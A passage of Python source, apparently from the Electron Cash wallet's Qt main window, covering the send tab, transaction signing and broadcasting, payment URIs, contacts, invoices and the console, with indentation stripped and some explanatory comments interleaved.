ret.setData(0, Qt.UserRole, name(item))
ret.setData(0, Qt.UserRole+1, is_unremovable)
return ret
for item in self.pay_from:
twi = new(item)
if spendable is not None and item not in spendable:
grayify(twi)
self.from_list.addTopLevelItem(twi)
if name(item) == sel:
self.from_list.setCurrentItem(twi)
if spendable is not None: # spendable may be None if no plugin filtered coins.
for item in spendable:
# append items added by the plugin to the spendable list
# at the bottom. These coins are marked as "not removable"
# in the UI (the plugin basically insisted these coins must
# be spent with the other coins in the list for privacy).
if item not in self.pay_from:
twi = new(item, True)
self.from_list.addTopLevelItem(twi)
if name(item) == sel:
self.from_list.setCurrentItem(twi)
def get_contact_payto(self, contact : Contact) -> str:
assert isinstance(contact, Contact)
_type, label = contact.type, contact.name
emoji_str = ''
mod_type = _type
mine_str = ''
if _type.startswith('cashacct'): # picks up cashacct and the cashacct_W pseudo-contacts
if _type == 'cashacct_T':
# temporary "pending verification" registration pseudo-contact. Never offer it as a completion!
return None
mod_type = 'cashacct'
info = self.wallet.cashacct.get_verified(label)
if info:
emoji_str = f' {info.emoji}'
if _type == 'cashacct_W':
mine_str = ' [' + _('Mine') + '] '
else:
self.print_error(label, "not found")
# could not get verified contact, don't offer it as a completion
return None
elif _type == 'openalias':
return contact.address
return label + emoji_str + ' ' + mine_str + '<' + contact.address + '>' if mod_type in ('address', 'cashacct') else None
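# Illustrative completion string built above (values hypothetical):
#
#   "satoshi#123 🎉 [Mine] <bitcoincash:qq...>"
#
# i.e. label, optional verification emoji, optional [Mine] marker, then
# the address in angle brackets. OpenAlias contacts yield just their
# address; unverified cash accounts yield None and are never offered.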
def update_completions(self):
l = []
for contact in self.contact_list.get_full_contacts(include_pseudo=True):
s = self.get_contact_payto(contact)
if s is not None: l.append(s)
l.sort(key=lambda x: x.lower()) # case-insensitive sort
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
on_pw_cancel = kwargs.pop('on_pw_cancel', None)
while self.wallet.has_password():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
if callable(on_pw_cancel):
on_pw_cancel()
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
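# Usage sketch for the decorator above; see sign_tx() below for a real
# use. Hypothetical method name:
#
#   @protected
#   def do_sensitive_thing(self, arg, *, password):
#       ...  # `password` is injected by request_password(); the wrapped
#            # call never happens if the user cancels the dialog.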
def read_send_tab(self):
isInvoice = False
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
isInvoice = True
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
if self.payto_e.is_alias and not self.payto_e.validated:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
try:
# handle op_return if specified and enabled
opreturn_message = self.message_opreturn_e.text()
if opreturn_message:
if self.opreturn_rawhex_cb.isChecked():
outputs.append(OPReturn.output_for_rawhex(opreturn_message))
else:
outputs.append(OPReturn.output_for_stringdata(opreturn_message))
except OPReturn.TooLarge as e:
self.show_error(str(e))
return
except OPReturn.Error as e:
self.show_error(str(e))
return
if not outputs:
self.show_error(_('No outputs'))
return
for _type, addr, amount in outputs:
if amount is None:
self.show_error(_('Invalid Amount'))
return
freeze_fee = self.fee_e.isVisible() and self.fee_e.isModified() and (self.fee_e.text() or self.fee_e.hasFocus())
fee = self.fee_e.get_amount() if freeze_fee else None
coins = self.get_coins(isInvoice)
return outputs, fee, label, coins
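# read_send_tab() returns (outputs, fee, label, coins) on success and
# None (implicitly) on any validation error; do_send() below bails out
# on a falsy result.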
def _chk_no_segwit_suspects(self):
''' Makes sure the payto_e has no addresses that might be BTC segwit
in it and if it does, warn user. Intended to be called from do_send.
Returns True if no segwit suspects were detected in the payto_e,
False otherwise. If False is returned, a suitable error dialog
will have already been presented to the user. '''
if bool(self.config.get('allow_legacy_p2sh', False)):
return True
segwits = set()
prefix_char = '3' if not networks.net.TESTNET else '2'
for line in self.payto_e.lines():
line = line.strip()
if ':' in line and line.lower().startswith(networks.net.CASHADDR_PREFIX + ":"):
line = line.split(':', 1)[1] # strip bitcoincash: prefix
if ',' in line:
line = line.split(',', 1)[0] # if address, amount line, strip address out and ignore rest
line = line.strip()
if line.startswith(prefix_char) and Address.is_valid(line):
segwits.add(line)
if segwits:
msg = ngettext("Possible BTC Segwit address in 'Pay to' field. "
"Please use CashAddr format for p2sh addresses.\n\n{segwit_addresses}",
"Possible BTC Segwit addresses in 'Pay to' field. "
"Please use CashAddr format for p2sh addresses.\n\n{segwit_addresses}",
len(segwits)).format(segwit_addresses='\n'.join(segwits))
detail = _("Legacy '{prefix_char}...' p2sh address support in the Send tab is "
"restricted by default in order to prevent inadvertently "
"sending BCH to Segwit BTC addresses.\n\n"
"If you are an expert user, go to 'Preferences -> Transactions' "
"to enable the use of legacy p2sh addresses in the Send tab.").format(prefix_char=prefix_char)
self.show_error(msg, detail_text=detail)
return False
return True
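# Parsing sketch for the loop above: a 'Pay to' line may look like
# "bitcoincash:<addr>, <amount>"; the cashaddr prefix and the amount are
# stripped before testing. On mainnet, base58 addresses starting with '3'
# ('2' on testnet) are p2sh, hence possible wrapped-Segwit BTC
# destinations, which is what triggers the warning dialog.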
def _warn_if_legacy_address(self):
"""Show a warning if self.payto_e has legacy addresses, since the user
might be trying to send BTC instead of BCH."""
warn_legacy_address = bool(self.config.get("warn_legacy_address", True))
if not warn_legacy_address:
return
for line in self.payto_e.lines():
line = line.strip()
if line.lower().startswith(networks.net.CASHADDR_PREFIX + ":"):
line = line.split(":", 1)[1] # strip "bitcoincash:" prefix
if "," in line:
# if address, amount line, strip address out and ignore rest
line = line.split(",", 1)[0]
line = line.strip()
if Address.is_legacy(line):
msg1 = (
_("You are about to send BCH to a legacy address.")
+ "<br><br>"
+ _("Legacy addresses are deprecated for Bitcoin Cash "
"(BCH), but they are used by Bitcoin (BTC).")
)
msg2 = _("Proceed if what you intend to do is to send BCH.")
msg3 = _("If you intend to send BTC, close the application "
"and use a BTC wallet instead. Electron Cash is a "
"BCH wallet, not a BTC wallet.")
res = self.msg_box(
parent=self,
icon=QMessageBox.Warning,
title=_("You are sending to a legacy address"),
rich_text=True,
text=msg1,
informative_text=msg2,
detail_text=msg3,
checkbox_text=_("Never show this again"),
checkbox_ischecked=False,
)
if res[1]: # Never ask if checked
self.config.set_key("warn_legacy_address", False)
break
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
# paranoia -- force a resolve right away in case user pasted an
# openalias or cashacct and hit preview too quickly.
self.payto_e.resolve(force_if_has_focus=True)
if not self._chk_no_segwit_suspects():
return
self._warn_if_legacy_address()
r = self.read_send_tab()
if not r:
return
outputs, fee, tx_desc, coins = r
try:
tx = self.wallet.make_unsigned_transaction(coins, outputs, self.config, fee)
except NotEnoughFunds:
self.show_message(_("Insufficient funds"))
return
except ExcessiveFee:
self.show_message(_("Your fee is too high. Max is 50 sat/byte."))
return
except BaseException as e:
traceback.print_exc(file=sys.stderr)
self.show_message(str(e))
return
amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
#if fee < self.wallet.relayfee() * tx.estimated_size() / 1000 and tx.requires_fee(self.wallet):
#self.show_error(_("This transaction requires a higher fee, or it will not be propagated by the network"))
#return
if preview:
# NB: this ultimately takes a deepcopy of the tx in question
# (TxDialog always takes a deep copy).
self.show_transaction(tx, tx_desc)
return
# We must "freeze" the tx and take a deep copy of it here. This is
# because it's possible that it points to coins in self.pay_from and
# other shared data. We want the tx to be immutable from this point
# forward with its own private data. This fixes a bug where sometimes
# the tx would stop being "is_complete" randomly after broadcast!
tx = copy.deepcopy(tx)
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = 2 * self.config.max_fee_rate()
# IN THE FUTURE IF WE WANT TO APPEND SOMETHING IN THE MSG ABOUT THE FEE, CODE IS COMMENTED OUT:
#if fee > confirm_rate * tx.estimated_size() / 1000:
# msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if fee < tx.estimated_size():
msg.append(_('Warning') + ': ' + _("You're using a fee of less than 1.0 sats/B. It may take a very long time to confirm."))
tx.ephemeral['warned_low_fee_already'] = True
if self.config.get('enable_opreturn') and self.message_opreturn_e.text():
msg.append(_("You are using an OP_RETURN message. This gets permanently written to the blockchain."))
if self.wallet.has_password():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx, tx_desc)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
# call hook to see if plugin needs gui interaction
run_hook('sign_tx', self, tx)
def on_signed(result):
callback(True)
def on_failed(exc_info):
self.on_error(exc_info)
callback(False)
if self.tx_external_keypairs:
task = partial(Transaction.sign, tx, self.tx_external_keypairs, use_cache=True)
else:
task = partial(self.wallet.sign_transaction, tx, password, use_cache=True)
WaitingDialog(self, _('Signing transaction...'), task,
on_signed, on_failed)
def broadcast_transaction(self, tx, tx_desc, *, callback=None):
def broadcast_thread():
# non-GUI thread
status = False
msg = "Failed"
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
if pr:
refund_address = self.wallet.get_receiving_addresses()[0]
ack_status, ack_msg = pr.send_payment(str(tx), refund_address)
if not ack_status:
if ack_msg == "no url":
# "no url" hard-coded in send_payment method
# it means merchant doesn't need the tx sent to him
# since he didn't specify a POST url.
# so we just broadcast and rely on that result status.
ack_msg = None
else:
return False, ack_msg
# at this point either ack_status is True or there is "no url"
# and we proceed anyway with the broadcast
status, msg = self.network.broadcast_transaction(tx)
# figure out what to return...
msg = ack_msg or msg # prefer the merchant's ack_msg over the broadcast msg, but fallback to broadcast msg if no ack_msg.
status = bool(ack_status or status) # if both broadcast and merchant ACK failed -- it's a failure. if either succeeded -- it's a success
if status:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
else:
# Not a PR, just broadcast.
status, msg = self.network.broadcast_transaction(tx)
return status, msg
# Check fee and warn if it's below 1.0 sats/B (and not warned already)
fee = None
try: fee = tx.get_fee()
except: pass # no fee info available for tx
# Check fee >= size otherwise warn. FIXME: If someday network relay
# rules change to be other than 1.0 sats/B minimum, this code needs
# to be changed.
if (isinstance(fee, int) and tx.is_complete() and fee < len(str(tx))//2
and not tx.ephemeral.get('warned_low_fee_already')):
msg = _('Warning') + ': ' + _("You're using a fee of less than 1.0 sats/B. It may take a very long time to confirm.") + "\n\n" + _("Proceed?")
if not self.question(msg, title = _("Low Fee")):
return
# /end fee check
# Capture current TL window; override might be removed on return
parent = self.top_level_window()
if self.gui_object.warn_if_no_network(self):
# Don't allow a useless broadcast when in offline mode. Previous to this we were getting an exception on broadcast.
return
elif not self.network.is_connected():
# Don't allow a potentially very slow broadcast when obviously not connected.
parent.show_error(_("Not connected"))
return
def broadcast_done(result):
# GUI thread
cb_result = False
if result:
status, msg = result
if status:
cb_result = True
buttons, copy_index, copy_link = [ _('Ok') ], None, ''
try: txid = tx.txid() # returns None if not is_complete, but may raise potentially as well
except: txid = None
if txid is not None:
if tx_desc is not None:
self.wallet.set_label(txid, tx_desc)
copy_link = web.BE_URL(self.config, 'tx', txid)
if copy_link:
# tx is complete and there is a copy_link
buttons.insert(0, _("Copy link"))
copy_index = 0
if parent.show_message(_('Payment sent.') + '\n' + msg,
buttons = buttons,
defaultButton = buttons[-1],
escapeButton = buttons[-1]) == copy_index:
# There WAS a 'Copy link' and they clicked it
self.copy_to_clipboard(copy_link, _("Block explorer link copied to clipboard"), self.top_level_window())
self.invoice_list.update()
self.do_clear()
else:
if msg.startswith("error: "):
msg = msg.split(" ", 1)[-1] # take the last part, sans the "error: " prefix
parent.show_error(msg)
if callback:
callback(cb_result)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices, *, add_cancel_button=False):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
buts = [OkButton(dialog)]
if add_cancel_button:
buts.insert(0, CancelButton(dialog))
vbox.addLayout(Buttons(*buts))
result = dialog.exec_()
dialog.setParent(None)
if not result:
return None
return clayout.selected_index()
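# Usage sketch (hypothetical labels): hardware-wallet handlers call this
# roughly as
#
#   idx = window.query_choice(msg, [_("Account 0"), _("Account 1")])
#   if idx is None:
#       ...  # dialog dismissed / cancelled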
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.amount_e, self.message_e]:
e.setFrozen(True)
self.max_button.setDisabled(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
request_error = (self.payment_request and self.payment_request.error) or ''
self.payment_request = None
self.print_error("PaymentRequest error:", request_error)
self.show_error(_("There was an error processing the payment request"), rich_text=False, detail_text=request_error)
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = web.parse_URI(URI, self.on_pr, strict=True, on_exc=self.on_error)
except web.ExtraParametersInURIWarning as e:
out = e.args[0] # out dict is in e.args[0]
extra_params = e.args[1:]
self.show_warning(ngettext('Extra parameter in URI was ignored:\n\n{extra_params}',
'Extra parameters in URI were ignored:\n\n{extra_params}',
len(extra_params)
).format(extra_params=', '.join(extra_params)))
# fall through ...
except web.BadURIParameter as e:
extra_info = (len(e.args) > 1 and str(e.args[1])) or ''
self.print_error('Bad URI Parameter:', *[repr(i) for i in e.args])
if extra_info:
extra_info = '\n\n' + extra_info # prepend newlines
self.show_error(_('Bad parameter: {bad_param_name}{extra_info}').format(bad_param_name=e.args[0], extra_info=extra_info))
return
except web.DuplicateKeyInURIError as e:
# this exception always has a translated message as args[0]
# plus a list of keys as args[1:], see web.parse_URI
self.show_error(e.args[0] + ":\n\n" + ', '.join(e.args[1:]))
return
except Exception as e:
self.show_error(_('Invalid bitcoincash URI:') + '\n\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
op_return = out.get('op_return')
op_return_raw = out.get('op_return_raw')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address or URI.strip().lower().split(':', 1)[0] in web.parseable_schemes():
# if address, set the payto field to the address.
# if *not* address, then we set the payto field to the empty string
# only IFF it was bitcoincash: and/or cashacct:, see issue #1131.
self.payto_e.setText(address or '')
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
if op_return:
self.message_opreturn_e.setText(op_return)
self.message_opreturn_e.setHidden(False)
self.opreturn_rawhex_cb.setHidden(False)
self.opreturn_rawhex_cb.setChecked(False)
self.opreturn_label.setHidden(False)
elif op_return_raw is not None:
# 'is not None' allows blank value.
# op_return_raw takes lower precedence than op_return
if not op_return_raw:
op_return_raw='empty'
self.message_opreturn_e.setText(op_return_raw)
self.message_opreturn_e.setHidden(False)
self.opreturn_rawhex_cb.setHidden(False)
self.opreturn_rawhex_cb.setChecked(True)
self.opreturn_label.setHidden(False)
elif not self.config.get('enable_opreturn'):
self.message_opreturn_e.setText('')
self.message_opreturn_e.setHidden(True)
self.opreturn_rawhex_cb.setHidden(True)
self.opreturn_label.setHidden(True)
if address and URI.lower().startswith(cashacct.URI_SCHEME + ':'):
# this is important so that cashacct: URIs get insta-resolved
# (they only get resolved when payto_e loses focus)
self.message_e.setFocus()
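# Illustrative URI accepted above (address elided):
#
#   bitcoincash:<addr>?amount=0.1&message=donation&op_return=hello
#
# An 'r' parameter, or a 'name'+'sig' pair, switches to the BIP70
# payment request path instead of filling in the send fields directly.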
def do_clear(self):
''' Clears the send tab, resetting its UI state to its initial state.'''
self.max_button.setChecked(False)
self.not_enough_funds = False
self.op_return_toolong = False
self.payment_request = None
self.payto_e.is_pr = False
self.payto_e.is_alias, self.payto_e.validated = False, False # clear flags to avoid bad things
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e, self.fee_e, self.message_opreturn_e]:
e.setText('')
e.setFrozen(False)
self.payto_e.setHidden(False)
self.payto_label.setHidden(False)
self.max_button.setDisabled(False)
self.opreturn_rawhex_cb.setChecked(False)
self.opreturn_rawhex_cb.setDisabled(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.message_opreturn_e.setVisible(self.config.get('enable_opreturn', False))
self.opreturn_rawhex_cb.setVisible(self.config.get('enable_opreturn', False))
self.opreturn_label.setVisible(self.config.get('enable_opreturn', False))
self.update_status()
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_coin_state(self, utxos, freeze):
self.wallet.set_frozen_coin_state(utxos, freeze)
self.utxo_list.update()
self.update_fee()
def create_converter_tab(self):
source_address = QLineEdit()
cash_address = ButtonsLineEdit()
cash_address.addCopyButton()
cash_address.setReadOnly(True)
legacy_address = ButtonsLineEdit()
legacy_address.addCopyButton()
legacy_address.setReadOnly(True)
widgets = [
(cash_address, Address.FMT_CASHADDR),
(legacy_address, Address.FMT_LEGACY),
]
def convert_address():
try:
addr = Address.from_string(source_address.text().strip())
except:
addr = None
for widget, fmt in widgets:
if addr:
widget.setText(addr.to_full_string(fmt))
else:
widget.setText('')
source_address.textChanged.connect(convert_address)
w = QWidget()
grid = QGridLayout()
grid.setSpacing(15)
grid.setColumnStretch(1, 2)
grid.setColumnStretch(2, 1)
label = QLabel(_('&Address to convert'))
label.setBuddy(source_address)
grid.addWidget(label, 0, 0)
grid.addWidget(source_address, 0, 1)
label = QLabel(_('&Cash address'))
label.setBuddy(cash_address)
grid.addWidget(label, 1, 0)
grid.addWidget(cash_address, 1, 1)
label = QLabel(_('&Legacy address'))
label.setBuddy(legacy_address)
grid.addWidget(label, 2, 0)
grid.addWidget(legacy_address, 2, 1)
w.setLayout(grid)
label = WWLabel(_(
"This tool helps convert between address formats for Bitcoin "
"Cash addresses.\nYou are encouraged to use the 'Cash address' "
"format."
))
vbox = QVBoxLayout()
vbox.addWidget(label)
vbox.addWidget(w)
vbox.addStretch(1)
w = QWidget()
w.setLayout(vbox)
return w
def create_list_tab(self, l, list_header=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if list_header:
hbox = QHBoxLayout()
for b in list_header:
hbox.addWidget(b)
hbox.addStretch()
vbox.addLayout(hbox)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
return self.create_list_tab(l)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?"
.format(addr.to_ui_string()))):
self.wallet.delete_address(addr)
self.update_tabs()
self.update_status()
self.clear_receive_tab()
def get_coins(self, isInvoice = False):
coins = []
if self.pay_from:
coins = copy.deepcopy(self.pay_from)
else:
coins = self.wallet.get_spendable_coins(None, self.config, isInvoice)
run_hook("spendable_coin_filter", self, coins) # may modify coins -- used by CashShuffle if in shuffle = ENABLED mode.
if self.pay_from:
# coins may have been filtered, so indicate this in the UI
self.redraw_from_list(spendable=coins)
return coins
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
run_hook('on_spend_coins', self, coins) # CashShuffle: will set the mode of send tab to coins[0]'s shuffled/unshuffled state
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.do_clear()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, contacts : List[Contact]):
paytos = []
for contact in contacts:
s = self.get_contact_payto(contact)
if s is not None: paytos.append(s)
self.payto_payees(paytos)
def payto_payees(self, payees : List[str]):
''' Like payto_contacts except it accepts a list of free-form strings
rather than requiring a list of Contacts objects '''
self.show_send_tab()
if len(payees) == 1:
self.payto_e.setText(payees[0])
self.amount_e.setFocus()
else:
text = "\n".join([payee + ", 0" for payee in payees])
self.payto_e.setText(text)
self.payto_e.setFocus()
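# Example of the multi-payee text constructed above (placeholders):
#
#   alice#100, 0
#   bitcoincash:<addr>, 0
#
# Amounts default to 0 so the user can fill them in after the paste.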
def resolve_cashacct(self, name):
''' Throws up a WaitingDialog while it resolves a Cash Account.
Goes out to network, verifies all tx's.
Returns: a tuple of: (Info, Minimally_Encoded_Formatted_AccountName)
Argument `name` should be a Cash Account name string of the form:
name#number.123
name#number
name#number.; etc
If the result would be ambiguous, that is considered an error, so enough
of the account name#number.collision_hash needs to be specified to
unambiguously resolve the Cash Account.
On failure throws up an error window and returns None.'''
return cashacctqt.resolve_cashacct(self, name)
def set_contact(self, label, address, typ='address', replace=None) -> Contact:
''' Returns a reference to the newly inserted Contact object.
replace is optional and if specified, replace an existing contact,
otherwise add a new one.
Note that duplicate contacts will not be added multiple times, but in
that case the returned value would still be a valid Contact.
Returns None on failure.'''
assert typ in ('address', 'cashacct')
contact = None
if typ == 'cashacct':
tup = self.resolve_cashacct(label) # this displays an error message for us
if not tup:
self.contact_list.update() # Displays original
return
info, label = tup
address = info.address.to_ui_string()
contact = Contact(name=label, address=address, type=typ)
elif not Address.is_valid(address):
# Bad 'address' code path
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return
else:
# Good 'address' code path...
contact = Contact(name=label, address=address, type=typ)
assert contact
if replace != contact:
if self.contacts.has(contact):
self.show_error(_(f"A contact named {contact.name} with the same address and type already exists."))
self.contact_list.update()
return replace or contact
self.contacts.add(contact, replace_old=replace, unique=True)
self.contact_list.update()
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.update_completions()
# The contact has changed, update any addresses that are displayed with the old information.
run_hook('update_contact2', contact, replace)
return contact
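# Usage sketch (illustrative): resolving and storing a Cash Account
# contact; the address argument is effectively ignored for typ='cashacct'
# since it is taken from the resolved Info:
#
#   contact = window.set_contact('satoshi#123', '', typ='cashacct')
#   # returns the new Contact on success; None on failure (an error
#   # dialog will already have been shown).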
def delete_contacts(self, contacts):
n = len(contacts)
qtext = ''
if n <= 3:
def fmt(contact):
if len(contact.address) > 20:
addy = contact.address[:10] + '…' + contact.address[-10:]
else:
addy = contact.address
return f"{contact.name} <{addy}>"
names = [fmt(contact) for contact in contacts]
contact_str = ", ".join(names)
qtext = _("Remove {list_of_contacts} from your contact list?").format(list_of_contacts = contact_str)
else:
# Note: we didn't use ngettext here for plural check because n > 1 in this branch
qtext = _("Remove {number_of_contacts} contacts from your contact list?").format(number_of_contacts=n)
if not self.question(qtext):
return
removed_entries = []
for contact in contacts:
if self.contacts.remove(contact):
removed_entries.append(contact)
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.contact_list.update()
self.update_completions()
run_hook('delete_contacts2', removed_entries)
def show_invoice(self, key):
pr = self.invoices.get(key)
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self.top_level_window(), _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1].to_ui_string(), pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
weakD = Weak.ref(d)
def do_export():
ext = pr.export_file_ext()
fn = self.getSaveFileName(_("Save invoice to file"), "*." + ext)
if not fn:
return
with open(fn, 'wb') as f:
f.write(pr.export_file_data())
self.show_message(_('Invoice saved as') + ' ' + fn)
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.invoice_list.update()
d = weakD()
if d: d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
d.setParent(None) # So Python can GC
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console(wallet=self.wallet)
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({'wallet' : self.wallet,
'network' : self.network,
'plugins' : self.gui_object.plugins,
'window': self})
console.updateNamespace({'util' : util, 'bitcoin':bitcoin})
set_json = Weak(self.console.set_json)
c = commands.Commands(self.config, self.wallet, self.network, lambda: set_json(True))
methods = {}
password_getter = Weak(self.password_dialog)
def mkfunc(f, method):
return lambda *args, **kwargs: f(method, *args, password_getter=password_getter,
**kwargs)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
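# The mkfunc() indirection above avoids Python's late-binding-closure
# pitfall: referencing the loop variable `m` directly would make every
# lambda see the *last* method name. Minimal illustration:
#
#   funcs = [lambda m=m: m for m in ('a', 'b')]
#   assert [f() for f in funcs] == ['a', 'b']   # not ['b', 'b']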
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("")
sb.addWidget(self.balance_label)
self._search_box_spacer = QWidget()
self._search_box_spacer.setFixedWidth(6) # 6 px spacer
self.search_box = QLineEdit()
self.search_box.setPlaceholderText(_("Search wallet, {key}F to hide").format(key='Ctrl+' if sys.platform != 'darwin' else '⌘'))
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box, 1)
self.update_available_button = StatusBarButton(QIcon(":icons/electron-cash-update.svg"), _("Update available, click for details"), lambda: self.gui_object.show_update_checker(self, skip_check=True))
self.update_available_button.setStatusTip(_("An Electron Cash update is available"))
sb.addPermanentWidget(self.update_available_button)
self.update_available_button.setVisible(bool(self.gui_object.new_version_available)) # if hidden now gets unhidden by on_update_available when a new version comes in
self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog)
sb.addPermanentWidget(self.password_button)
self.addr_converter_button = StatusBarButton(
self.cashaddr_icon(),
_("Toggle CashAddr Display"),
self.toggle_cashaddr_status_bar
)
self.update_cashaddr_icon()
sb.addPermanentWidget(self.addr_converter_button)
self.addr_converter_button.setHidden(self.gui_object.is_cashaddr_status_button_hidden())
self.gui_object.cashaddr_status_button_hidden_signal.connect(self.addr_converter_button.setHidden)
